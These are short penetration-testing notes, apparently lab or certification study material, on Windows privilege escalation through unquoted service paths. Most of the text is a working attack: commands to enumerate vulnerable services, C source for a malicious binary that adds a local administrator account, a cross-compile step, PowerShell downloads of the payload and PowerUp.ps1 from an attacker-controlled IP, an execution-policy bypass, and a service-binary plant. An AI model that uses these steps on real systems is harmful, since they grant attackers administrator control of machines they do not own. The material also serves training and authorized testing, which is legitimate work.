7. Unquoted Service Paths

C:\Program Files\My Program\My Service\service.exe
---------------------------------------------------
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

Unquoted Service Path Service Privesc:

  1. Enumerate running services for misconfigured paths (only works in cmd):
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
  1. Check for write access rights in the service's butchered search order swith 'icacls'.
  2. Create malicious binary. Example in C which will create a new user:
#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}
  1. Cross-compile it to an 64-bit .exe for Windows:
x86_64-w64-mingw32-gcc <file>.c -o <file>.exe
  1. Serve the binary, download it, and move it to the correct directory:
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move <pre-path> <post-path>
  1. Restart the service -- win!

Automatic Unquoted Service Path Privesc with PowerUp:

  1. Serve the PowerUp.ps1 on your kali machine.
  2. Download the script:
iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
  1. Run the script with bypass:
 powershell -ep bypass
 . .\PowerUp.ps1
  1. Now check for vulerable paths:
Get-UnquotedService
  1. Try to use the built-in AbuseFunction to install a service binary (where name is Service Name listed from above command):
Write-ServiceBinary -Name '<servicename>' -Path "C:\Program Files\Enterprise Apps\Current.exe"
  1. Win!